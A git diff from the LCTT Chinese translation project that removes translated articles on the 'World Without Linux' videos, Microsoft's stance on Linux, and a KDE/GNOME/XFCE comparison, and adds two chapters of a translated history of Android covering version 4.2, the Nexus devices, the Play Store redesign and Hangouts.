-我们很喜欢人们在短片一上映就开始的激烈辩论。该短片上映当天观看量就超过了 100,000 次,这引起了人们对 Linux 在社会中扮演的角色,以及全球的社区贡献者和维护者的关注。当然了,没有 Linux 的话,因特网也是会出现的,只是不会是我们如今所熟知的这个互联网而已。每一个短片都对 Linux 在我们每天生活中扮演的角色进行了大胆且有趣的描述。我们希望,这些短片能够把关于 Linux 的故事推广到全世界的人的心里去。
-
-### 为什么 Sam 和 Annie 的那只猫叫做 String? ###
-
-该短片系列中没有一处剧情是偶然的。仔细观看的话,你就会发现其中关于 Linux 和极客们的各种玩笑。小猫 String 是我们的 Linux.com 主编 Libby Clark 根据弦理论(string theory)亲自命名的。在物理学里,弦理论是一个理论框架,它用一种叫做弦(String)的一维对象替换了粒子物理学中的点状粒子,并描述了这些弦如何在空间中传播以及相互作用。就像 Sam、Annie 和 String 在那个没有 Linux 的世界里的关系那样。
-
-### 我们期待已久的下两集是什么样的,特别是,最后那集什么时候上映? ###
-
-在 #5 短片中,我们将到太空,并体验一下没有 Linux 的世界对太空探索的影响。那将是一场疯狂的旅程。在短片系列的最后,我们最终还是会见到没有 Linux 的世界里的 Linus。贯穿整个短片系列,里边已经给出了关于结局的线索,我在这就不能给太多提示了,因为还有好多人在找线索比赛中继续寻找着。并且我也不能向你们透露结局短片的上映日期。你们要自己跟进 #WorldWithoutLinux 主题帖来获取更多信息。
-
-### 你可给一些关于 #4 短片相关线索的提示吗? ###
-
-在该短片中有另外一个关于免费汉堡餐厅(Free Burger Restaurant)的线索。在那个没有 Linux 的世界里,Linux 最后还是以一种很隐秘的方式出现了,可以说,就像是以另一种语言来解读 Linux。当然,这只是为了好玩,String 也是另外一个模样。
-
-### 那么,该系列短片达到你所想要的效果了吗? ###
-
-是的,达到了。我们很高兴看到人们分享并参与到这些故事中去。
-我们希望向那些可能不知道 Linux 的人传达更多关于 Linux 的故事并了解 Linux 在当今世界中是无处不在的。全部的短片就是为了把这些关于 Linux 的真相推广给大家,并感谢那些全球性社区的开发者和公司对 Linux 的支持,Linux 使得一切成为可能。
-
---------------------------------------------------------------------------------
-
-via: http://thevarguy.com/open-source-application-software-companies/linux-foundation-explains-world-without-linux-and-open-so
-
-作者:[Christopher Tozzi][a]
-译者:[GHLandy](https://github.com/GHLandy)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://thevarguy.com/author/christopher-tozzi
-[1]:http://linuxfoundation.org/
-[2]:http://www.linuxfoundation.org/world-without-linux
-[3]:http://thevarguy.com/open-source-application-software-companies/new-linux-foundation-video-highlights-role-open-source-3d
-[4]:http://thevarguy.com/open-source-application-software-companies/100715/would-internet-exist-without-linux-yes-without-open-sourc
diff --git a/translated/talk/20151126 Microsoft and Linux--True Romance or Toxic Love.md b/translated/talk/20151126 Microsoft and Linux--True Romance or Toxic Love.md
deleted file mode 100644
index d16ed99114..0000000000
--- a/translated/talk/20151126 Microsoft and Linux--True Romance or Toxic Love.md
+++ /dev/null
@@ -1,77 +0,0 @@
-微软和 Linux :真正的浪漫还是有毒的爱情?
-================================================================================
-时不时的我们会读到一个能让你喝咖啡呛到或者把热拿铁喷到你显示器上的新闻故事。微软最近宣布的对 Linux 的钟爱就是这样一个鲜明的例子。
-
-从常识来讲,微软和自由开源软件(FOSS)运动就是恒久的敌人。在很多人眼里,微软体现了过分的贪婪,而这正为自由开源软件运动(FOSS)所拒绝。另外,之前微软就已经给自由开源软件社区贴上了"一伙强盗"的标签。
-
-我们能够理解为什么微软一直以来都害怕免费的操作系统。免费操作系统结合挑战微软核心产品线的开源应用时,就威胁到了微软在台式机和笔记本电脑市场的控制地位。
-
-尽管微软担忧的是自己在台式机上的主导地位,Linux 产生最大影响的却是网络服务器市场。今天,大多数的服务器都运行着 Linux,包括世界上最繁忙站点的服务器。对微软来说,眼睁睁看着这么多收不到的许可证收入,一定是非常痛苦的。
-
-掌上设备是微软输给自由软件的另一个领域。曾几何时,微软的 Windows CE 和 Pocket PC 操作系统走在移动计算的前沿,Windows PDA 设备是最闪亮、最豪华的产品。但是这一切在苹果公司发布了 iPhone 之后都结束了。从那时起,安卓开始进入公众视野,Windows 的移动产品开始被忽略、被遗忘。而安卓平台正是建立在自由开源组件的基础上的。
-
-由于安卓平台的开放性,安卓的市场份额在迅速扩大。不像 IOS,任何一个手机制造商都可以发布安卓手机。也不像Windows手机,安卓没有许可费用。这对消费者来说是件好事。这也导致了许多强大却又价格低廉的手机制造商在世界各地涌现。这非常明确的证明了自由开源软件(FOSS)的价值。
-
-在服务器和移动计算的角逐中失利,对微软来说是非常惨重的损失。考虑到服务器和移动计算这两个市场加起来的规模,台式机市场似乎就是一潭死水。没有人喜欢失败,尤其是涉及到金钱时。并且,微软确实正在失去很多。你可能以为微软会因此怀恨在心。在过去,确实如此。
-
-微软使用了各种可以支配的手段来对 Linux 和自由开源软件(FOSS)进行反击,从宣传攻势到专利威胁。尽管这种攻击确实减慢了人们采用 Linux 的步伐,但却从来没有让 Linux 的脚步停下。
-
-所以,当微软在开源大会和重大事件上拿出印有"Microsoft Loves Linux"的T-恤和徽章时,请原谅我们表现出来的震惊。这是真的吗?微软真的爱 Linux ?
-
-当然,公关的口号和免费的T-恤并不代表真理。行动胜于雄辩。当你思考一下微软的行动时,微软的立场就变得有点模棱两可了。
-
-一方面,微软招募了几百名 Linux 开发者和系统管理员,将 .NET 核心框架作为一个开源的项目进行了发布,并提供了跨平台的支持(这样 .NET 就可以跑在 OS X 和 Linux 上了)。并且,微软与 Linux 企业合作,把最流行的发行版放到了 Azure 平台上。事实上,微软已经走得如此之远,以至于要为 Azure 数据中心开发自己的 Linux 发行版了。
-
-另一方面,微软继续直接通过法律手段或者傀儡公司来对开源项目进行攻击。很明显,在和自由软件的较量上,微软并没有发自内心的重大道德转变。那为什么要公开声明对 Linux 的钟爱之情呢?
-
-一个显而易见的事实:微软是一个经营性实体。对股东来说是一个投资工具,对雇员来说是收入来源。微软所做的只有一个终极目标:盈利。微软并没有表现出来爱或者恨(尽管这是一个最常见的指控)。
-
-所以问题不应该是"微软真的爱 Linux 吗?"相反,我们应该问,微软是怎么从这一切中获利的。
-
-让我们以 .NET 核心框架的开源发布为例。这一举动使得 .NET 运行时环境可以很容易地移植到任何平台,这使得微软的 .NET 框架所涉及到的范围远远大于 Windows 平台。
-
-开放 .NET 的核心包,最终使得 .NET 开发者开发跨平台的app成为可能,比如OS X,Linux甚至安卓——都基于同一个核心代码库。
-
-从开发者角度来讲,这使得.NET框架比之前更有吸引力了。能够从单一的代码库就可以触及到多个平台,使得使用.NET框架开发的任何app戏剧性的扩大了潜在的目标市场。
-
-另外,一个强大的开源社区能够为开发者提供代码,让他们在自己的项目中复用。所以,大量可用的开源项目也将会成就 .NET 框架。
-
-更进一步讲,开放 .NET 的核心代码能够减少跨越不同平台所产生的碎片化,这意味着消费者可以有更广泛的 app 选择。无论是开源软件还是专有 app,都有更多的选择。
-
-从微软的角度来讲,会得到一队开发者大军。微软可以通过销售培训、证书、技术支持、开发者工具(包括Visual Studio)和应用扩展来获利。
-
-我们应该自问的是,这对自由软件社区有利还是有弊?
-
-.NET 框架的大范围采用,意味着许多与之竞争的开源项目的消亡,迫使我们跟着微软的节奏走下去。
-
-先抛开 .NET 不谈,微软正在花费大量的精力让 Azure 云计算平台支持 Linux。要记得,Azure 最初叫做 Windows Azure,Windows 服务器是唯一能够支撑 Azure 的操作系统。而今天,Azure 也提供了对多个 Linux 发行版的支持。
-
-这背后只有一个原因:那些需要或者想要 Linux 服务的付费顾客。如果微软不提供 Linux 虚拟机,那些顾客就会找别人合作了。
-
-看上去,微软意识到了 “Linux 就在这里” 的现实。微软不能真正地消灭它,所以必须接受它。
-
-这又把我们带回到那个问题:关于微软和Linux为什么有这么多的流言?我们在谈论这个问题,因为微软希望我们思考这个问题。毕竟,所有这些谈资都会追溯到微软,不管是在新闻稿、博客还是会议上的公开声明。微软在努力吸引大家对其在Linux专业知识方面的注意力。
-
-不然,首席架构师 Kamala Subramaniam 发表博文宣布 Azure Cloud Switch(ACS)背后还能有什么其他企图呢?ACS 是一个定制的 Linux 发行版,微软用它来对 Azure 数据中心的交换机硬件进行自动化配置。
-
-ACS不是公开的。它是用于Azure内部使用的。别人也不太可能找到这个发行版其他的用途。事实上,Subramaniam 在她的博文中也表述了同样的观点。
-
-所以,微软不会通过卖 ACS 来获利,也不会通过免费发放它来获得用户。相反,微软在 Linux 和 Azure 上投入精力,以巩固自己作为 Linux 云计算平台的地位。
-
-微软最近迷上Linux对社区来说是好消息吗?
-
-我们不应该忘记微软 “拥抱、扩展、消灭” 的老套路。现在,微软还处在拥抱 Linux 的初期阶段。将来,微软会通过定制扩展和专有标准来分裂社区吗?
-
-赶紧评论吧,让我们知道你是怎么想的。
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxjournal.com/content/microsoft-and-linux-true-romance-or-toxic-love-0
-
-作者:[James Darvell][a]
-译者:[sonofelice](https://github.com/sonofelice)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.linuxjournal.com/users/james-darvell
\ No newline at end of file
diff --git a/translated/talk/20151202 KDE vs GNOME vs XFCE Desktop.md b/translated/talk/20151202 KDE vs GNOME vs XFCE Desktop.md
deleted file mode 100644
index bdbaf2cdbd..0000000000
--- a/translated/talk/20151202 KDE vs GNOME vs XFCE Desktop.md
+++ /dev/null
@@ -1,47 +0,0 @@
-KDE,GNOME和XFCE的较量
-================================================================================
-![](http://1426826955.rsc.cdn77.org/wp-content/uploads/2013/07/300px-Xfce_logo.svg_.png)
-这么多年来,很多人一直都在他们的 Linux 桌面上使用 KDE 或者 GNOME 桌面环境。这两个桌面环境经过多年的发展之后,仍然在继续扩大它们的用户群。而在轻量级桌面环境中,XFCE 一举成为了最受欢迎的那一个:LXDE 缺少不少视觉上的吸引力,而默认配置下的 XFCE 就能在这方面打败它。XFCE 提供了用户能在 GNOME2 下使用的所有功能特性。但是必须承认,在一些非常老旧的计算机上,它的轻量级特性也未必能带来流畅的效果。
-
-### 桌面主题定制 ###
-用户完成安装之后,XFCE 看起来可能会有一点无聊,因为它在视觉上还缺少一些吸引力。但是,请不要误解我的话,XFCE 仍然是一个漂亮的桌面,只是在大多数刚接触它的用户眼中,它可能显得有些平淡。好消息是,给 XFCE 安装新主题是一个十分容易的过程:快速找到你喜欢的 XFCE 主题,然后将它解压到合适的目录中。从这一点上来说,XFCE 自带的一个重要的图形界面工具可以帮助用户轻松地选中已经下载好的主题,这可能是目前在 XFCE 上最好用的方式了。按照上面的指示去做,对于任何想要尝试 XFCE 的用户来说,都不存在任何困难。
-
-在GNOME桌面上,用户也可以按照上面的方法去做。不过,其中最主要的不同点就是用户必须手动下载并安装GNOME Tweak Tool,这样才能继续你想做的事。当然,对于使用任何一种方式都不会有什么障碍,但是对于用户来说,使用XFCE安装和激活主题并不需要去额外的下载并安装任何tweak tool可能是他们无法忽略的一个优势。而在GNOME上,尤其是在用户已经下载并安装了GNOME Tweak tool之后,你仍将必须确保你已经安装了用户主题拓展。
-
-和在 XFCE 上一样,用户需要先搜索并下载自己喜欢的主题。然后,用户可以打开 GNOME Tweak Tool,点击该工具界面左边的 Appearance 按钮,接着便可以简单地通过点击相应的按钮并选择已经下载好的主题来应用它。当一切都完成之后,用户将会看到一个告知主题已经成功应用的对话框,这样,你的主题便安装完成了。用户也可以简单地使用滚动条来选择他们想要的主题。和 XFCE 一样,主题激活的过程十分简单;然而,仅仅为了使用一个新主题就必须额外下载一个并未内置的应用,这一点也是需要考虑的。
-
-最后,就是 KDE 桌面主题定制的过程了。和 XFCE 一样,不需要下载额外的工具来安装主题。从这点来看,让人感觉 KDE 才是最后的赢家。不仅在 KDE 上可以完全使用图形用户界面来安装主题,甚至只需要点击 “获取新主题” 的按钮,就可以定位、查看,并自动安装新的主题。
-
-然而,需要指出的是,KDE 被认为是一个比 XFCE 更重量级的桌面环境。因此,我们也应该想想,为什么有些桌面环境会为了极简的目标而移除一些额外的功能。即便如此,我们也必须为 KDE 提供了如此出色的功能而给予它肯定。
-
-### MATE不是一个轻量级的桌面环境 ###
-在继续比较XFCE,GNOME3和KDE之前,必须对这方面的老手作一个事先说明,我们不会将MATE桌面环境加入到我们的比较中。MATE可被认为是GNOME2的另一个衍生品,但是它并没有声称是作为一款轻量级或者快捷桌面。相反,它的主要目的是成为一款更加传统和舒适的桌面环境,并使它的用户感觉就像在家里使用它一样。
-
-另一方面,XFCE 生来就是要实现它自己的一系列使命:XFCE 给它的用户提供一个更加轻量级、但在视觉上仍然具有吸引力的桌面环境。然而,对于一些认为 MATE 也是一款轻量级桌面环境的人来说,MATE 真正的目标并不是成为轻量级桌面。这两个选择在各自安装了一款好的主题之后,看起来都会非常具有吸引力。
-
-### 桌面导航 ###
-XFCE 提供了一种开箱即用、一目了然的导航方式。任何使用过传统 Windows 或者 GNOME 2/MATE 桌面环境的用户,都可以在没有任何帮助的情况下自如地使用新安装的 XFCE 桌面。紧接着,向面板中添加小程序的方式也非常直观。至于查找已安装的应用程序,只需直接打开启动器,并点击你想要运行的应用程序图标即可。除了 LXDE 和 MATE 之外,还没有其他桌面的导航能做到如此简单。不仅如此,控制面板的使用也同样简单,这对于刚接触这个桌面的用户来说是一个非常大的好处。但如果用户更喜欢用老式的方法去使用他们的桌面,那么 GNOME 就不太合适了。没有最小化按钮、引入了热区(hot corner)的设计,再加上其他的应用布局方式,这意味着新用户需要花些时间去适应这种设计风格。
-
-如果用户来自 Windows 桌面环境,那么他们将要放弃一些旧习惯,因为,他们无法简单地通过鼠标右击一下,就将一个小程序添加到他们工作空间的顶部。与此相反,这可以通过使用拓展来实现。GNOME 的拓展支持是可用的,并且非常容易,这种容易体现在:用户只需要简单地使用位于 GNOME 拓展页面上的 on/off 开关即可。不过,用户必须清楚,只有通过访问该页面才能使用这个功能。
-
-另一方面,GNOME 正在它的外观中体现它的设计理念,即为用户提供一个直观和易用的控制面板。你可能认为那并不是什么大事,但是,在我看来,它确实值得称赞并且有必要被提及。KDE 给它的用户提供了大量传统的桌面使用体验,并通过提供相似的启动器和更加类似的软件获取方式,来迎合来自 Windows 的用户。添加小图标或者小程序到 KDE 桌面是件非常简单的事情,只需要在桌面的底部右击即可。KDE 的问题在于,用户想找的很多 KDE 特性实际上都是隐藏的。KDE 的用户可能会反对我的这个观点,但我仍然坚持我的说法。
-
-为了添加小部件,只需要在我的面板上右击,就可以看见面板选项,但这并不是安装小部件的一个快速方法。通常在你选择了面板选项之后,才能看到 “添加小部件” 这一项。这对我来说不是个问题,但是对于一些用户来说,它会变成不必要的困惑。更复杂的是,当用户好不容易找到小部件区域后,又会发现一个叫做 “Activities(活动)” 的全新术语。它和小部件位于同一个区域,但它的功能却自成一体。
-
-现在请不要误解我,KDE 中的活动特性是很不错的,也是很有价值的,但是从可用性的角度看,为了不让新手困惑,把它放到另一个菜单选项中会更合适。欢迎提出不同意见,但对新手们的反复测试已经一次又一次地证明了这一点。吐槽归吐槽,KDE 添加新部件的方法的确很棒。与 KDE 的主题一样,用户可以通过提供的图形用户界面浏览并自动安装小部件。这是一个非常棒的功能,也理应得到称赞。KDE 的控制面板可能不像用户希望的那样简单易用,但是有一点很清楚,这将是他们致力于改进的地方。
-
-### 因此,XFCE是最好的桌面环境,对吗? ###
-我在我的计算机上使用 GNOME、KDE,并在我办公室和家里的电脑上使用 XFCE。我还有一些老机器在使用 Openbox 和 LXDE。每一种桌面的使用体验都能给我提供一些有用的东西,帮助我以我认为合适的方式使用每台机器。对我来说,XFCE 在我心里有着特殊的地位,因为作为一个桌面环境,我坚持使用了它很多年。但在这篇文章中,我日常使用的电脑上装的,事实上是 GNOME。
-
-这篇文章的主要思想是:我还是觉得 XFCE 能提供稍好一点的用户体验,对于那些正在寻找稳定的、传统的、容易理解的桌面环境的用户来说,XFCE 是理想的选择。欢迎您在评论部分和我们分享你的意见。
-
---------------------------------------------------------------------------------
-
-via: http://www.unixmen.com/kde-vs-gnome-vs-xfce-desktop/
-
-作者:[M.el Khamlichi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.unixmen.com/author/pirat9/
diff --git a/translated/talk/The history of Android/22 - The history of Android.md b/translated/talk/The history of Android/22 - The history of Android.md
new file mode 100644
index 0000000000..aabe79cfa1
--- /dev/null
+++ b/translated/talk/The history of Android/22 - The history of Android.md
@@ -0,0 +1,84 @@
+安卓编年史
+================================================================================
+### Android 4.2,果冻豆——全新 Nexus 设备,全新平板界面 ###
+
+安卓平台成熟的脚步越来越快,谷歌也将越来越多的应用托管到 Play 商店,需要通过系统更新来更新的应用越来越少。但是不间断的更新还是要继续的,2012 年 11 月,安卓 4.2 发布。4.2 还是叫做“果冻豆”,这个版本主要是一些少量变动。
+
+![LG 生产的 Nexus 4 和三星生产的 Nexus 10。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/unnamed.jpg)
+LG 生产的 Nexus 4 和三星生产的 Nexus 10。
+Google/Ron Amadeo 供图
+
+和安卓 4.2 一同发布的还有两部旗舰设备,Nexus 4 和 Nexus 10,都由谷歌直接在 Play 商店出售。Nexus 4 使用了 Nexus 7 的策略,令人惊讶的低价和高质量,并且无锁设备售价 300 美元。Nexus 4 有一个 4 核 1.5GHz 骁龙 S4 Pro 处理器,2GB 内存以及 1280×768 分辨率 4.7 英寸 LCD 显示屏。谷歌的新旗舰手机由 LG 生产,并和制造商一起将关注点转向了材料和质量。Nexus 4 有着正反两面双面玻璃,这会让你爱不释手,它是有史以来触感最佳的安卓手机之一。Nexus 4 最大的缺点是没有 LTE 支持,那时候大部分手机,包括 Verizon 版 Galaxy Nexus 都有更快的基带。但 Nexus 4 的需求仍大大超出了谷歌的预料——发布当日大量的流量拖垮了 Play 商店网站。手机在一小时之内销售一空。
+
+Nexus 10 是谷歌的第一部 10 英寸 Nexus 平板。该设备的亮点是 2560×1600 分辨率的显示屏,在其等级上是分辨率最高的。这背后是双核 1.7GHz Cortex A15 处理器和 2GB 内存的强力支持。随着时间一个月一个月地流逝,Nexus 10 似乎逐渐成为了第一部也是最后一部 10 英寸 Nexus 平板。通常这些设备每年都升级,但 Nexus 10 至今面世 16 个月了,可预见的未来还没有新设备的迹象。谷歌在小尺寸的 7 英寸平板上做得很出色,它似乎更倾向于让[像三星][1]这样的合作伙伴探索更大的平板家族。
+
+![新的锁屏,壁纸,以及时钟小部件设计。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/JBvsjb.jpg)
+新的锁屏,壁纸,以及时钟小部件设计。
+Ron Amadeo 供图
+
+4.2 为锁屏带来了很多变化。文字居中,并且对小时使用了较大的字重,对分钟使用了较细的字体。锁屏现在是分页的,可以自定义小部件。锁屏不仅仅是一个简单的时钟,用户还可以将其替换成其它小部件或者添加额外的页面和更多的小部件。
+
+![锁屏的添加小部件页面,小部件列表,锁屏上的 Gmail 部件,以及滑动到相机。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/locksc2reen.jpg)
+锁屏的添加小部件页面,小部件列表,锁屏上的 Gmail 部件,以及滑动到相机。
+Ron Amadeo 供图
+
+锁屏现在就像是一个精简版的主屏幕。页面轮廓会显示在锁屏的左右两侧来提示用户可以滑动到有其他小部件的页面。向左滑动页面会显示一个中间带有加号的简单空白页面,点击加号会打开兼容锁屏的小部件列表。锁屏每个页面限制一个小部件,将小部件向上或向下拖动可以展开或收起。最右侧的页面保留给了相机——一个简单的滑动就能打开相机界面,但是你没办法滑动回来。
+
+![新的快速设置面板以及内置应用集合。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/42fix.png)
+新的快速设置面板以及内置应用集合。
+Ron Amadeo 供图
+
+4.2 最大的新增特性之一就是“快速设置”面板。安卓 3.0 为平板引入了快速改变电源设置的途径,4.2 终于将这种能力带给了手机。通知中心右上角加入了一枚新图标,可以在正常的通知列表和新的快速设置之间切换。快速设置提供了对屏幕亮度,网络连接,电池以及数据用量更加快捷的访问,而不用打开完整的设置界面。安卓 4.1 中顶部的设置按钮移除掉了,快速设置中添加了一个按钮来替代它。
+
+应用抽屉和 4.2 中的应用阵容有很多改变。得益于 Nexus 4 更宽的屏幕横纵比(5:3,Galaxy Nexus 是 16:9),应用抽屉可以显示一行五个应用图标的方阵。4.2 将自带的浏览器替换为了 Google Chrome,自带的日历换成了 Google Calendar,他们都带来了新的图标设计。时钟和相机应用在 4.2 中经过了重制,新的图标也是其中的一部分。“Google Settings”是个新应用,用于提供对系统范围内所有存在的谷歌账户设置的快捷方式,它有着和 Google Search 和 Google+ 图标一致的风格。谷歌地图拥有了新图标,谷歌纵横,以往是谷歌地图的一部分,作为对 Google+ location 的支持在这个版本退役。
+
+![浏览器替换为 Chrome,带有全屏取景器的新相机界面。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/chroemcam.jpg)
+浏览器替换为 Chrome,带有全屏取景器的新相机界面。
+Ron Amadeo 供图
+
+原自带浏览器在一段时间内对 Chrome 的模仿上下了不少功夫——它引入了许多 Chrome 的界面元素,许多 Chrome 的特性,甚至还使用了 Chrome 的 javascript 引擎——但安卓 4.2 来临的时候,谷歌认为安卓版的 Chrome 已经准备好替代这个模仿者了。表面上看起来没有多大不同;界面看起来不一样,而且早期版本的 Chrome 安卓版滚动起来没有原浏览器顺畅。不过深层次来说,一切都不一样。安卓的主浏览器开发现在由 Google Chrome 团队负责,而不是作为安卓团队的子项目存在。安卓的默认浏览器从绑定安卓版本发布停滞不前的应用变成了不断更新的 Play 商店应用。现在甚至还有一个每个月接收一些更新的 beta 通道。
+
+相机界面经过了重新设计。它现在完全是个全屏应用,显示摄像头的实时图像并且在上面显示控制选项。布局审美和安卓 1.5 的[相机设计][2]有很多共同之处:带对焦的最小化的控制放置在取景器显示之上。中间的控制环在你长按屏幕或点击右下角圆形按钮的时候显示。你的手指保持在屏幕上时,你可以滑动来选择环上的选项,通常是展开进入一个子菜单。在高亮的选项上释放手指选中它。这灵感很明显来自于安卓 4.0 浏览器中的快速控制,但是将选项安排在一个环上意味着你的手指几乎总会挡住一部分界面。
+
+![时钟应用,从一个只有两个界面的应用变成功能强大,实用的应用。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/clock-1.jpg)
+时钟应用,从一个只有两个界面的应用变成功能强大,实用的应用。
+Ron Amadeo 供图
+
+时钟应用经过了完整的改造,从一个简单的两个界面的闹钟,到一个世界时钟,闹钟,定时器,以及秒表俱全。时钟应用的设计和谷歌之前引入的完全不同,有着极简审美和红色高亮。它看起来像是谷歌的一个试验。甚至是几个版本之后,这个设计语言似乎也仅限于这个应用。
+
+时钟的时间选择器是经过特别精心设计的。它显示一个简单的数字盘,会智能地禁用会导致无效时间的数字。设置闹钟时间时,也必须显式地选择 AM 或 PM,永远地解决了不小心将 9am 的闹钟设置成 9pm 的问题。
+
+![平板的新系统界面使用了延展版的手机界面。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/tablet2.jpg)
+平板的新系统界面使用了延展版的手机界面。
+Ron Amadeo 供图
+
+安卓 4.2 中最有争议的改变是平板界面,从单独一个统一的底部系统栏变成带有顶部状态栏和底部系统栏的双栏设计。新设计统一了手机和平板的界面,但批评人士说将手机界面延展到 10 英寸的横向平板上是浪费空间。因为导航按键现在拥有了整个底栏,所以他们像手机界面那样被居中。
+
+![平板上的多用户,以及新的手势键盘。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-06-14.55.png)
+平板上的多用户,以及新的手势键盘。
+Ron Amadeo 供图
+
+在平板上,安卓 4.2 带来了多用户支持。在设置里,新增了“用户”部分,你可以在这里管理一台设备上的用户。设置在每个用户账户内完成,安卓会给每个用户保存单独的设置,主屏幕,应用以及应用数据。
+
+4.2 还添加了有滑动输入能力的键盘。用户可以将手指一直保持在屏幕上,按顺序在字母按键上滑动来输入,而不用像以前那样一个一个字母单独地输入。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron 是 Ars Technica 的评论编辑,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物,看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/22/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://arstechnica.com/gadgets/2014/01/hands-on-with-samsungs-notepro-and-tabpro-new-screen-sizes-and-magazine-ui/
+[2]:http://cdn.arstechnica.net/wp-content/uploads/2013/12/device-2013-12-26-11016071.png
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/The history of Android/23 - The history of Android.md b/translated/talk/The history of Android/23 - The history of Android.md
new file mode 100644
index 0000000000..a6693ee6ec
--- /dev/null
+++ b/translated/talk/The history of Android/23 - The history of Android.md
@@ -0,0 +1,57 @@
+安卓编年史
+================================================================================
+![Play 商店又一次重新设计!这一版非常接近现在的设计,卡片结构让改变布局变得易如反掌。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/get-em-Kirill.jpg)
+Play 商店又一次重新设计!这一版非常接近现在的设计,卡片结构让改变布局变得易如反掌。
+Ron Amadeo 供图
+
+### 周期外更新——谁需要一个新系统? ###
+
+在安卓 4.2 和安卓 4.3 之间,谷歌进行了一次周期外更新,显示了有多少安卓可以不经过费力的 OTA 更新而得到改进。得益于[谷歌 Play 商店和 Play 服务][1],这些更新可以在不更新任何系统核心组件的前提下送达。
+
+2013 年 4 月,谷歌发布了谷歌 Play 商店的一个主要设计改动。就如同在这之后的大多数重新设计,新的 Play 商店完全接受了 Google Now 审美,即在灰色背景上的白色卡片。操作栏基于当前页面内容部分更改颜色,由于首屏内容以商店的各部分为主,操作栏颜色是中性的灰色。导航至内容部分的按钮指向热门付费,在那下面通常是一块促销内容或一组推荐应用。
+
+![独立的内容部分有漂亮的颜色。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/content-rainbow.jpg)
+独立的内容部分有漂亮的颜色。
+Ron Amadeo 供图
+
+新的 Play 商店展现了谷歌卡片设计语言的真正力量,在所有的屏幕尺寸上能够拥有响应式布局。一张大的卡片能够和若干小卡片组合,大屏幕设备能够显示更多的卡片,而且相对于拉伸来适应横屏模式,可以通过在一行显示更多卡片来适应。Play 商店的内容编辑们也可以自由地使用卡片布局;需要关注的大更新可以获得更大的卡片。这个设计最终会慢慢渗透向其它谷歌 Play 内容应用,最后拥有一个统一的设计。
+
+![Hangouts 取代了 Google Talk,现在仍由 Google+ 团队继续开发。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/talkvhangouts2.jpg)
+Hangouts 取代了 Google Talk,现在仍由 Google+ 团队继续开发。
+Ron Amadeo 供图
+
+Google I/O,谷歌的年度开发者会议,通常会宣布一个新的安卓版本。但是 2013 年的会议,谷歌只是发布了一些改进而没有系统更新。
+
+谷歌宣布的大事件之一是 Google Talk 的更新,谷歌的即时消息平台。在很长一段时间里,谷歌随安卓附带了四个文本交流应用:Google Talk,Google+ Messenger,信息(短信应用),Google Voice。拥有四个应用来完成相同的任务——给某人发送文本消息——对用户来说很混乱。在 I/O 上,谷歌结束了 Google Talk 并且从头开始创建全新的消息产品 [Google Hangouts][2]。虽然最初只是想替代 Google Talk,Hangouts 的计划是将谷歌所有不同的消息应用统一到同一个界面下。
+
+Hangouts 的用户界面布局真的和 Google Talk 没什么大的差别。主页面包含你的聊天会话,点击某一项就能进入聊天页面。界面设计上有所更新,聊天页面现在使用了卡片风格来显示每个段落,并且聊天列表是个“抽屉”风格的界面,这意味着你可以通过水平滑动打开它。Hangouts 有已读回执和输入状态指示,并且群聊现在是个主要特性。
+
+Google+ 是 Hangouts 的中心,所以产品的全名实际上是 “Google+ Hangouts”。Hangouts 完全整合到了 Google+ 桌面站点。身份和头像直接从 Google+ 拉取,点击头像会打开用户的 Google+ 资料。和将浏览器换为 Google Chrome 类似,核心安卓功能交给了一个单独的团队——Google+ 团队——而不再是忙碌的安卓工程师们的一个副产品。随着 Google+ 团队的接手,安卓的主要即时通讯客户端成为了一个持续开发的应用。它被放进了 Play 商店,并且有稳定的更新频率。
+
+![新导航抽屉界面。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/navigation_drawer_overview1.png)
+新导航抽屉界面。
+图片来自 [developer.android.com][3]
+
+谷歌还给操作栏引入了新的设计元素:导航抽屉。这个抽屉显示为在左上角应用图标旁的三道横线。点击或从屏幕左边缘向右滑动,会出现一个侧边菜单目录。就像名字所指明的,这个是用来应用内导航的,它会显示若干应用内的顶层位置。这使得应用首屏可以用来显示内容,也给了用户一致的,易于访问的导航元素。导航抽屉基本上就是个大号的菜单,可以滚动并且固定在左侧。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron 是 Ars Technica 的评论编辑,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物,看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
